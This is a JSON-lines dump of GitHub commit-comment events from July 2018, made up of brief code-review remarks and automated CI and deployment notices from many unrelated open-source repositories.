{"id":"7938161338","type":"CommitCommentEvent","actor":{"login":"pascalgrimaud"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":29643052,"position":4,"line":52,"path":"generators/client/templates/react/src/test/javascript/e2e/modules/administration/administration.spec.ts.ejs","commit_id":"c579d661eb46a63d22a0ac806a917f85cb2015aa","created_at":"2018-07-09T14:53:56Z","updated_at":"2018-07-09T14:53:56Z","author_association":"MEMBER","body":"@ruddell : I think we should remove the condition on oauth2 in the import, at:\r\nhttps://github.com/jhipster/generator-jhipster/commit/c579d661eb46a63d22a0ac806a917f85cb2015aa#diff-b72ef2540bd4998d10ccf3b525376befL23"}},"created_at":"2018-07-09T14:53:56Z"}
{"id":"7938164022","type":"CommitCommentEvent","actor":{"login":"jmarsac"},"repo":{"name":"OSGeo-fr/QGIS-conf-fr-website"},"payload":{"comment":{"id":29643061,"position":null,"line":null,"path":null,"commit_id":"d1d551e8cade52e96ec2e84ccee7de11830b332e","created_at":"2018-07-09T14:54:21Z","updated_at":"2018-07-09T14:54:21Z","author_association":"COLLABORATOR","body":"Nouveau logo OSGeo"}},"created_at":"2018-07-09T14:54:21Z"}
{"id":"7938164059","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29643063,"position":14,"line":13,"path":"src/main/java/com/agurova/services/impl/UnsplashStockImagesService.java","commit_id":"73ca78bf5e0eb188612a5f21252a61e92576ba85","created_at":"2018-07-09T14:54:22Z","updated_at":"2018-07-09T14:54:22Z","author_association":"COLLABORATOR","body":"Магическая строковое значение. Неплохобы вынести в файл с настройками.\r\n"}},"created_at":"2018-07-09T14:54:22Z"}
{"id":"7938164437","type":"CommitCommentEvent","actor":{"login":"tkrystkowiak"},"repo":{"name":"ProjektTwitter/TwitterStatApp2"},"payload":{"comment":{"id":29643065,"position":null,"line":null,"path":null,"commit_id":"74b507839db9b1b011e77cbd013f4dd30b59e8dc","created_at":"2018-07-09T14:54:25Z","updated_at":"2018-07-09T14:54:25Z","author_association":"CONTRIBUTOR","body":"Here instalable apk file."}},"created_at":"2018-07-09T14:54:25Z"}
{"id":"7938169663","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29643074,"position":null,"line":null,"path":null,"commit_id":"576f5bbb4dddd58dc92612bbbdb8095da6ed027e","created_at":"2018-07-09T14:55:13Z","updated_at":"2018-07-09T14:55:13Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [s3doclink](https://s3doclink-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/platform-considerations](https://s3doclink-static-docs.pantheonsite.io/docs/platform-considerations)\n"}},"created_at":"2018-07-09T14:55:13Z"}
{"id":"7938172877","type":"CommitCommentEvent","actor":{"login":"stevectorbot"},"repo":{"name":"stevector/nerdologues-d8"},"payload":{"comment":{"id":29643084,"position":null,"line":null,"path":null,"commit_id":"104bc39ae95760dac1119a5442490795f0382d22","created_at":"2018-07-09T14:55:40Z","updated_at":"2018-07-09T14:55:40Z","author_association":"NONE","body":"### Visual regression report:\n\n[![Visual report](https://circleci.com/gh/stevector/nerdologues-d8/1893/artifacts/0/artifacts/backstop_data/bitmaps_test/20180709-145448/failed_diff_0600294051_podcasts_0_document_0_desktop.png)](https://circleci.com/gh/stevector/nerdologues-d8/1893/artifacts/0/artifacts/backstop_data/html_report/index.html)"}},"created_at":"2018-07-09T14:55:40Z"}
{"id":"7938176177","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29643096,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-09T14:56:12Z","updated_at":"2018-07-09T14:56:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T14:56:12Z"}
{"id":"7938177433","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29643098,"position":null,"line":null,"path":null,"commit_id":"9d20f40eb47f3270e5a09629c082b8af78cbd927","created_at":"2018-07-09T14:56:23Z","updated_at":"2018-07-09T14:56:23Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-436](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-436).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-436-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T14:56:23Z"}
{"id":"7938178885","type":"CommitCommentEvent","actor":{"login":"am1808"},"repo":{"name":"richard-evans/vampire"},"payload":{"comment":{"id":29643103,"position":null,"line":null,"path":null,"commit_id":"da093549d4afafa6b494946b12ce16ed03a35e78","created_at":"2018-07-09T14:56:37Z","updated_at":"2018-07-09T14:56:37Z","author_association":"NONE","body":"Hi Richard,\r\n\r\nIt seems that you have forgot to add \r\n```\r\n#ifdef MPICF\r\n#endif\r\n```\r\naround \"namespace vmpi\" in \"src/mpi/decomposition.cpp\"\r\n\r\n"}},"created_at":"2018-07-09T14:56:37Z"}
{"id":"7938179895","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29643105,"position":null,"line":null,"path":null,"commit_id":"dc46b51784a4343841f12b2bbb94ebc8005ff3e1","created_at":"2018-07-09T14:56:46Z","updated_at":"2018-07-09T14:56:46Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [sgsolrnoc](https://sgsolrnoc-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/solr-drupal-8](https://sgsolrnoc-static-docs.pantheonsite.io/docs/solr-drupal-8)\n"}},"created_at":"2018-07-09T14:56:46Z"}
{"id":"7938180830","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29643107,"position":null,"line":null,"path":null,"commit_id":"64052172f4044eb6d4320bd72fe7d23f30e3620f","created_at":"2018-07-09T14:56:54Z","updated_at":"2018-07-09T14:56:54Z","author_association":"NONE","body":"Thanks, fixed in c50d0cb69db5f14017a33e8887b2258e7e4b3e58"}},"created_at":"2018-07-09T14:56:54Z"}
{"id":"7938188376","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29643124,"position":null,"line":null,"path":null,"commit_id":"dc70deade235a537ea159ef4030e3727fe348688","created_at":"2018-07-09T14:58:04Z","updated_at":"2018-07-09T14:58:04Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-253](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-253).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-253-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-09T14:58:04Z"}
{"id":"7938193744","type":"CommitCommentEvent","actor":{"login":"dastgirp"},"repo":{"name":"EyesOfAHawk/HPM-Plugins"},"payload":{"comment":{"id":29643140,"position":45,"line":45,"path":"src/plugins/check_resist.c","commit_id":"3c31445df77437eb6876209976531173ec0db049","created_at":"2018-07-09T14:58:54Z","updated_at":"2018-07-09T14:58:54Z","author_association":"NONE","body":"Add a check if it is less than ELE_MAX? else it can access other memory (or crash)"}},"created_at":"2018-07-09T14:58:54Z"}
{"id":"7938195359","type":"CommitCommentEvent","actor":{"login":"piotrMocz"},"repo":{"name":"piotrMocz/serverless-sandbox"},"payload":{"comment":{"id":29643144,"position":13,"line":49,"path":"src/Lib.hs","commit_id":"7a4de5d171b540e9e2e5edec5e05821b93a8966f","created_at":"2018-07-09T14:59:09Z","updated_at":"2018-07-09T14:59:09Z","author_association":"OWNER","body":"This works, but note that you could write:\r\n```haskell\r\nAws.loadCredentialsFromEnv >>= \\creds -> do\r\n   [...]\r\n```\r\nand make it look a bit nicer (would also work for `Either` etc)."}},"created_at":"2018-07-09T14:59:09Z"}
{"id":"7938196276","type":"CommitCommentEvent","actor":{"login":"jimwwalker"},"repo":{"name":"jimwwalker/kv_engine"},"payload":{"comment":{"id":29643148,"position":6,"line":26,"path":"engines/ep/src/collections/collections_types.cc","commit_id":"3acf41259f4af9fcbc4c92c8bbdf5ca5274f9b40","created_at":"2018-07-09T14:59:17Z","updated_at":"2018-07-09T14:59:17Z","author_association":"OWNER","body":"Manifest uid_t unchanged"}},"created_at":"2018-07-09T14:59:17Z"}
{"id":"7938201855","type":"CommitCommentEvent","actor":{"login":"Robbie1977"},"repo":{"name":"VirtualFlyBrain/VFB2"},"payload":{"comment":{"id":29643157,"position":null,"line":null,"path":null,"commit_id":"5dd0ef9c49b1b3f7c5962871bf7bd91c0438650d","created_at":"2018-07-09T15:00:10Z","updated_at":"2018-07-09T15:00:10Z","author_association":"NONE","body":"Fix for https://github.com/VirtualFlyBrain/geppetto-vfb/issues/229"}},"created_at":"2018-07-09T15:00:10Z"}
{"id":"7938203358","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29643166,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T15:00:21Z","updated_at":"2018-07-09T15:00:21Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - i386-Windows-7-VisualStudio-14: OK (2931 of 2931 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T15:00:21Z"}
{"id":"7938204497","type":"CommitCommentEvent","actor":{"login":"MarkTheFreak"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29643168,"position":null,"line":null,"path":null,"commit_id":"fcf589bdb9a22152ca4bc21f4b471696b3a3af62","created_at":"2018-07-09T15:00:29Z","updated_at":"2018-07-09T15:00:29Z","author_association":"NONE","body":"ooo interesting"}},"created_at":"2018-07-09T15:00:29Z"}
{"id":"7938205230","type":"CommitCommentEvent","actor":{"login":"piotrMocz"},"repo":{"name":"piotrMocz/serverless-sandbox"},"payload":{"comment":{"id":29643169,"position":80,"line":86,"path":"src/Lib.hs","commit_id":"7a4de5d171b540e9e2e5edec5e05821b93a8966f","created_at":"2018-07-09T15:00:36Z","updated_at":"2018-07-09T15:00:36Z","author_association":"OWNER","body":"If you change the `>>=` above to `<$>` you can skip the `Just`."}},"created_at":"2018-07-09T15:00:36Z"}
{"id":"7938207281","type":"CommitCommentEvent","actor":{"login":"ikzk"},"repo":{"name":"karoka/Phys514_HW2"},"payload":{"comment":{"id":29643180,"position":null,"line":null,"path":null,"commit_id":"0140be2c97d9fe07f1eeafe8380dfe5dc7c97e5c","created_at":"2018-07-09T15:00:53Z","updated_at":"2018-07-09T15:00:53Z","author_association":"NONE","body":"@karoka 你怎么能看出我是哪个。。"}},"created_at":"2018-07-09T15:00:53Z"}
{"id":"7938208330","type":"CommitCommentEvent","actor":{"login":"calebcabob"},"repo":{"name":"noobbuilds/platform_packages_apps_Settings"},"payload":{"comment":{"id":29643183,"position":null,"line":null,"path":null,"commit_id":"85ca14411a2c7d2f9f317584d6e7fccd98f5f60d","created_at":"2018-07-09T15:01:03Z","updated_at":"2018-07-09T15:01:03Z","author_association":"NONE","body":"Always gettin caught trying to slip in that D!! ... SMH 😝"}},"created_at":"2018-07-09T15:01:03Z"}
{"id":"7938213563","type":"CommitCommentEvent","actor":{"login":"timogauweiler"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29643201,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T15:01:51Z","updated_at":"2018-07-09T15:01:51Z","author_association":"NONE","body":"@mitelg that was also my first thought 😄 So what should that icon say/do? I'm still not getting it ..."}},"created_at":"2018-07-09T15:01:51Z"}
{"id":"7938217979","type":"CommitCommentEvent","actor":{"login":"PavlidisAris"},"repo":{"name":"PavlidisAris/coursera-test"},"payload":{"comment":{"id":29643206,"position":18,"line":18,"path":"index.md","commit_id":"5e212eb1f7c6c0ae3eed4fe4c7d95d8091588ef2","created_at":"2018-07-09T15:02:33Z","updated_at":"2018-07-09T15:02:33Z","author_association":"OWNER","body":"rwqeer"}},"created_at":"2018-07-09T15:02:33Z"}
{"id":"7938218729","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643209,"position":5,"line":672,"path":"hw/xbox/nv2a/nv2a_psh.c","commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:02:40Z","updated_at":"2018-07-09T15:02:40Z","author_association":"NONE","body":"Please implement this instead; should also be quite simple and we have pbkit which should be enough to write a proper unit test for this.\r\n\r\nIf we just remove asserts we'll get a ton of hard to debug visual issue reports.\r\nIt's already hard to tell what's going on with the existing graphics regression (black objects, normal is `vec3(0)`)."}},"created_at":"2018-07-09T15:02:40Z"}
{"id":"7938224713","type":"CommitCommentEvent","actor":{"login":"jon-a-nygaard"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":29643223,"position":null,"line":null,"path":null,"commit_id":"5c817ec16e64225a611cfd876e0c163b373bf4ed","created_at":"2018-07-09T15:03:36Z","updated_at":"2018-07-09T15:03:36Z","author_association":"COLLABORATOR","body":"Closes #8586"}},"created_at":"2018-07-09T15:03:36Z"}
{"id":"7938230658","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29643239,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-09T15:04:34Z","updated_at":"2018-07-09T15:04:34Z","author_association":"OWNER","body":"Doesn't it make sense then to continue work at your account? Preferably give _type-tests_ a new final name and include the after fork patches into it? We could make a release (or branch) to it to make it possible for users to work with it while the master branch is in work. I am sure users will soon switch to this repo. I suggest to change the executable name `troff` to something else, e.g. add one or more prefix letters to be able to have old troff and the advanced troff installed at the same time. If there no objections we should go this way.\r\n"}},"created_at":"2018-07-09T15:04:34Z"}
{"id":"7938231670","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29643241,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-09T15:04:44Z","updated_at":"2018-07-09T15:04:44Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/tree/master/test\r\n"}},"created_at":"2018-07-09T15:04:44Z"}
{"id":"7938231873","type":"CommitCommentEvent","actor":{"login":"ruddell"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":29643242,"position":4,"line":52,"path":"generators/client/templates/react/src/test/javascript/e2e/modules/administration/administration.spec.ts.ejs","commit_id":"c579d661eb46a63d22a0ac806a917f85cb2015aa","created_at":"2018-07-09T15:04:46Z","updated_at":"2018-07-09T15:04:46Z","author_association":"MEMBER","body":"You're right.  I didn't check that.  PR #7942"}},"created_at":"2018-07-09T15:04:46Z"}
{"id":"7938233240","type":"CommitCommentEvent","actor":{"login":"marcosgerene"},"repo":{"name":"marcosgerene/SPEDBr.NET"},"payload":{"comment":{"id":29643247,"position":45,"line":133,"path":"SpedBr/SpedBr.SpedFiscal/BlocoC.cs","commit_id":"eedcfc64594cfe33f70a9ce8af87ea10badb1b74","created_at":"2018-07-09T15:05:00Z","updated_at":"2018-07-09T15:05:00Z","author_association":"OWNER","body":"Esses campos não são obrigatórios para registros cancelados"}},"created_at":"2018-07-09T15:05:00Z"}
{"id":"7938236612","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643256,"position":11,"line":677,"path":"hw/xbox/nv2a/nv2a_psh.c","commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:05:32Z","updated_at":"2018-07-09T15:05:32Z","author_association":"NONE","body":"Should also be implemented as it has specific sampler requirements and is too important to just ignore."}},"created_at":"2018-07-09T15:05:32Z"}
{"id":"7938238884","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29643262,"position":null,"line":null,"path":null,"commit_id":"ce3bb118f49ba3e9584fc4ff9b58b5d42ef9b766","created_at":"2018-07-09T15:05:56Z","updated_at":"2018-07-09T15:05:56Z","author_association":"MEMBER","body":"Good question.  I went on readthedocs.io and figured out that you can configure which branches it will build from.  So I turned on the `poly-types` branch and now you can see it at https://disco-lang.readthedocs.io/en/poly-types/ .  It will automatically rebuild every time you push to that branch (though note it takes a few minutes to rebuild)."}},"created_at":"2018-07-09T15:05:56Z"}
{"id":"7938243985","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29643271,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-09T15:06:44Z","updated_at":"2018-07-09T15:06:44Z","author_association":"MEMBER","body":"Fixed in https://github.com/xwiki/xwiki-platform/commit/52fde6aa4f70e4df58241ce99ccf4b9677bd3d7e"}},"created_at":"2018-07-09T15:06:44Z"}
{"id":"7938247720","type":"CommitCommentEvent","actor":{"login":"soebbing"},"repo":{"name":"shopware/shopware"},"payload":{"comment":{"id":29643277,"position":155,"line":155,"path":"themes/Frontend/Responsive/frontend/_public/src/less/_variables/icons.less","commit_id":"e7a117d6bb87be08bfecc342163e02b12c88b2bd","created_at":"2018-07-09T15:07:20Z","updated_at":"2018-07-09T15:07:20Z","author_association":"CONTRIBUTOR","body":"As @PaddyS said, that name is most likely a typo. You could create a PR with an additional, new name (sw-icon-leftcross?) so that we are backward compatible."}},"created_at":"2018-07-09T15:07:20Z"}
{"id":"7938254339","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643289,"position":17,"line":682,"path":"hw/xbox/nv2a/nv2a_psh.c","commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:08:22Z","updated_at":"2018-07-09T15:08:22Z","author_association":"NONE","body":"This seems to also depend on `PS_TEXTUREMODES_DOT_STR_CUBE` and will also cause issues which would be insanely hard to debug."}},"created_at":"2018-07-09T15:08:22Z"}
{"id":"7938254606","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29643290,"position":null,"line":null,"path":null,"commit_id":"896cf8d7cf41d348752b91e7b4fd3e469c13d420","created_at":"2018-07-09T15:08:25Z","updated_at":"2018-07-09T15:08:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-34](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-34).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-34-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-09T15:08:25Z"}
{"id":"7938256853","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643296,"position":5,"line":2188,"path":"hw/xbox/nv2a/nv2a_pgraph.c","commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:08:46Z","updated_at":"2018-07-09T15:08:46Z","author_association":"NONE","body":"Line can be removed, I'd like to see a unit test. But I think this is fine?"}},"created_at":"2018-07-09T15:08:46Z"}
{"id":"7938262040","type":"CommitCommentEvent","actor":{"login":"phl0"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29643307,"position":5,"line":40,"path":"Config.h","commit_id":"34ef6fd0cfc70ed99ca945d2b009631d990a4341","created_at":"2018-07-09T15:09:35Z","updated_at":"2018-07-09T15:09:35Z","author_association":"CONTRIBUTOR","body":"I guess this was a mistake to have Duplex=1 in the default config?"}},"created_at":"2018-07-09T15:09:35Z"}
{"id":"7938262312","type":"CommitCommentEvent","actor":{"login":"atribolet"},"repo":{"name":"atribolet/gis.utah.gov"},"payload":{"comment":{"id":29643309,"position":29,"line":30,"path":"_posts/2018-07-06-municipal-boundaries-update-for-second-quarter-2018-calendar-year.md","commit_id":"98fc736a1b4a441604e68bb29bf4e6dc34b5f228","created_at":"2018-07-09T15:09:38Z","updated_at":"2018-07-09T15:09:38Z","author_association":"OWNER","body":"Is \"Ench\" correct here, or is this a typo?..."}},"created_at":"2018-07-09T15:09:38Z"}
{"id":"7938262655","type":"CommitCommentEvent","actor":{"login":"atribolet"},"repo":{"name":"atribolet/gis.utah.gov"},"payload":{"comment":{"id":29643311,"position":16,"line":17,"path":"_posts/2018-07-06-municipal-boundaries-update-for-second-quarter-2018-calendar-year.md","commit_id":"98fc736a1b4a441604e68bb29bf4e6dc34b5f228","created_at":"2018-07-09T15:09:42Z","updated_at":"2018-07-09T15:09:42Z","author_association":"OWNER","body":"In \"can affect others\"--what does \"others\" refer to? Can we clarify at all? "}},"created_at":"2018-07-09T15:09:42Z"}
{"id":"7938265124","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29643316,"position":14,"line":2201,"path":"hw/xbox/nv2a/nv2a_pgraph.c","commit_id":"540316d1dbc4e6b41aed2302cc1167e5586d5a15","created_at":"2018-07-09T15:10:05Z","updated_at":"2018-07-09T15:10:05Z","author_association":"NONE","body":"This needs a unit test. This is very GL-like behaviour but sounds very untypical for hardware.\r\nYou'll also find the same check in all other `SET_VERTEX_DATA` handlers. So it's a bad idea to just remove one of them."}},"created_at":"2018-07-09T15:10:05Z"}
{"id":"7938273973","type":"CommitCommentEvent","actor":{"login":"zzolain"},"repo":{"name":"skrk1211/skrk1211.github.io"},"payload":{"comment":{"id":29643334,"position":null,"line":null,"path":null,"commit_id":"8993fd27e6a08d60354c310edf0e965ef93ad0ae","created_at":"2018-07-09T15:11:24Z","updated_at":"2018-07-09T15:11:24Z","author_association":"NONE","body":"주말 코딩....👍🏻"}},"created_at":"2018-07-09T15:11:24Z"}
{"id":"7938279198","type":"CommitCommentEvent","actor":{"login":"gevorg"},"repo":{"name":"budjb/grails-rabbitmq-native"},"payload":{"comment":{"id":29643351,"position":null,"line":null,"path":null,"commit_id":"ff934a95f3a33c7eb9fc05b94787362a24c63a30","created_at":"2018-07-09T15:12:14Z","updated_at":"2018-07-09T15:12:14Z","author_association":"CONTRIBUTOR","body":"@budjb Thank You!, will you publish module?"}},"created_at":"2018-07-09T15:12:14Z"}
{"id":"7938279453","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29643354,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-09T15:12:17Z","updated_at":"2018-07-09T15:12:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T15:12:17Z"}
{"id":"7938282673","type":"CommitCommentEvent","actor":{"login":"dutnshae"},"repo":{"name":"Hack-with-Github/Awesome-Hacking"},"payload":{"comment":{"id":29643364,"position":null,"line":null,"path":null,"commit_id":"aa25570133be9c68f102b0ea591cc7ba23b44c17","created_at":"2018-07-09T15:12:46Z","updated_at":"2018-07-09T15:12:46Z","author_association":"NONE","body":"\r\n."}},"created_at":"2018-07-09T15:12:46Z"}
{"id":"7938288240","type":"CommitCommentEvent","actor":{"login":"AndersonTorres"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29643374,"position":null,"line":null,"path":null,"commit_id":"7a19228215eda4e24b4c37af5a2b0e6ce67c7d19","created_at":"2018-07-09T15:13:39Z","updated_at":"2018-07-09T15:13:39Z","author_association":"CONTRIBUTOR","body":"Fine. I will test it today or tomorrow.\r\n\r\nAbout the trivia, I am a bit strict and even annoying abou the 80-line limit. But I don't enforce it outside my \"creations\" :)."}},"created_at":"2018-07-09T15:13:39Z"}
{"id":"7938295851","type":"CommitCommentEvent","actor":{"login":"kurent"},"repo":{"name":"celtra/stateless-components"},"payload":{"comment":{"id":29643388,"position":55,"line":112,"path":"src/stateless/input.vue","commit_id":"b6dc57c7d52f675e0ce985a4c8cf7710014f1631","created_at":"2018-07-09T15:14:54Z","updated_at":"2018-07-09T15:14:54Z","author_association":"CONTRIBUTOR","body":"@matevzStinjek I wouldn't put defaults, or would handle it otherwise. The problem is, that now all inputs that are already implemented enforced a range from 0-100. We need to check if that is really intended on all of them.\r\n\r\nInstead, check for presence of those props and if set, enforce them."}},"created_at":"2018-07-09T15:14:54Z"}
{"id":"7938295854","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29643389,"position":null,"line":null,"path":null,"commit_id":"1be0498e83a7cc3f720116845d0a02f24ff71af8","created_at":"2018-07-09T15:14:54Z","updated_at":"2018-07-09T15:14:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180709-151453 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180709-151453\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-09T15:14:54Z"}
{"id":"7938298632","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29643398,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T15:15:20Z","updated_at":"2018-07-09T15:15:20Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-MacOS-10.9-clang: OK (2930 of 2931 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T15:15:20Z"}
